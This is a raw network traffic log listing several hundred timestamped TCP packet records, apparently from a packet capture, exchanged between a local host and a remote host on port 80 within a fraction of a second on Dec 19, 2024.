Dec 19, 2024 10:10:34.587610960 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587641954 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587647915 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587680101 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587682962 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587714911 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587718010 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587758064 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587791920 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587810040 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587827921 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587836981 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587862968 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587901115 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587908983 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.587935925 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587974072 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.587985992 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588009119 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588015079 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588046074 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588083029 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588093996 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588118076 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588146925 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588152885 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588174105 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588191986 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588227034 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588258028 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588260889 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588294983 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588295937 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588326931 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588330030 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588366032 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588402987 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588407040 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588438034 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588474035 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588489056 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588506937 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588543892 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588550091 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588577986 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588578939 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.588627100 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588661909 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.588670969 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.590253115 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.590301037 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.590362072 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.590406895 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.592634916 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.593590021 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.593637943 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.595078945 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.596256971 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.596560001 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.597613096 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.597662926 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.647089005 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.647202969 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.647339106 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.648401976 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.648437977 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.648499012 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.651652098 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.651688099 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.651727915 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.651768923 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.653183937 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.656223059 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.656456947 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.656495094 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.656507015 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.656531096 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.656575918 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.658099890 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.658138037 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.658184052 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.660567999 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.660604000 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.660655022 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.663216114 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.663253069 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.663278103 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.663305044 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.667452097 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.667489052 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.667545080 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.669840097 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.669888973 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.669905901 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.670000076 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.671416044 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.671458006 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.671516895 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.674540043 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.676198959 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.706934929 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707122087 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707159042 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707192898 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707194090 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707230091 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707237005 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707262993 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707268000 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707274914 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707304955 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707329035 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707356930 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707381010 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707417011 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707427025 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707453012 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707457066 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707505941 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707540989 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707552910 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707576036 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707576990 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707627058 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707662106 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707673073 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707696915 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707705975 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707730055 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707734108 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707768917 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707784891 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707804918 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707813025 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707840919 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707849026 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707878113 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707885027 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707912922 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.707920074 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.707963943 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.709266901 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.709326982 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.709384918 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.710345984 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.710516930 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.710573912 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.712857008 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.713016987 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.713071108 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.715384960 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.715441942 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.715457916 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.715599060 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.718087912 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.718126059 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.718142986 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.718159914 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.720669031 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.720685959 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.720731974 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.723097086 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.723222971 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.723272085 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.725058079 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.725122929 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.725187063 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.727389097 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.727440119 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.727444887 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.727981091 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.729687929 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.729747057 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.729801893 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.732651949 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.732707977 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.732790947 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.732871056 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.736452103 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.736514091 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.736886978 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.736942053 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.739134073 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.739193916 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.739382982 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.739440918 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.741112947 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.741167068 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.741179943 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.741220951 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.743136883 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.743196011 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.743252039 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.744391918 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.745482922 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.745537043 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.745537996 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.747595072 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.747656107 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.747778893 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.748544931 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.750016928 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.750152111 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.750197887 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.751933098 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.751991987 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.752046108 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.752089024 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.754240990 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.754354954 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.754414082 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.756727934 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.756794930 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.756836891 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.756907940 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.759269953 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.759329081 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.759478092 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.760469913 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.761920929 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.761976957 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.761977911 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.764230967 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.764293909 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.764300108 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.766748905 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.766880035 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.778363943 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.778448105 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.778526068 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.779613018 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.779978037 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.780038118 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.780106068 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.780153036 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.782476902 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.782557011 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.782608032 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.785033941 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.785110950 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.785166979 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.787470102 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.787529945 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.787614107 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.788209915 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.790324926 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.790379047 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.790383101 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.792560101 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.792619944 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.792684078 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.794989109 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.795051098 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.795097113 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.795145988 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.797435045 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.797552109 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.797605991 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.799837112 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.799938917 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.799993992 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.802263021 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.802319050 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.802417040 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.804246902 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.804611921 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.804784060 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.804830074 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.807008028 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.807054043 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.807141066 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.809993029 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.810000896 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.810048103 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.810070038 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.810117960 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.811871052 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.811919928 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.811973095 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.814131975 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.814182997 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.814203024 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.816483021 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.816521883 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.816673040 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.816721916 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.818871021 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.818937063 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.818983078 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.827960014 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.828000069 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.828031063 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.828054905 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.828954935 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.829049110 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.829094887 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.831592083 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.831646919 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.831712008 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.831767082 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.833776951 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.833825111 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.833889008 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.833935022 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.835731983 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.835783958 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.835891008 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.837755919 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.837773085 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.837798119 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.837820053 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.837862968 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.839791059 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.839848995 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.839849949 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.841176033 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.841222048 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.841312885 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.842567921 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.842608929 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.845424891 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.845478058 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.845510960 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.845818996 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.845868111 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.845983028 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.846029997 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.847228050 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.847284079 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.847332954 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.848628998 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.848680973 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.848684072 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.849922895 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.849971056 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.850064993 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.850109100 CET	49909	80	192.168.2.6	185.215.113.206
Dec 19, 2024 10:10:34.851444006 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.851600885 CET	80	49909	185.215.113.206	192.168.2.6
Dec 19, 2024 10:10:34.851648092 CET	49909	80	192.168.2.6	185.215.113.206
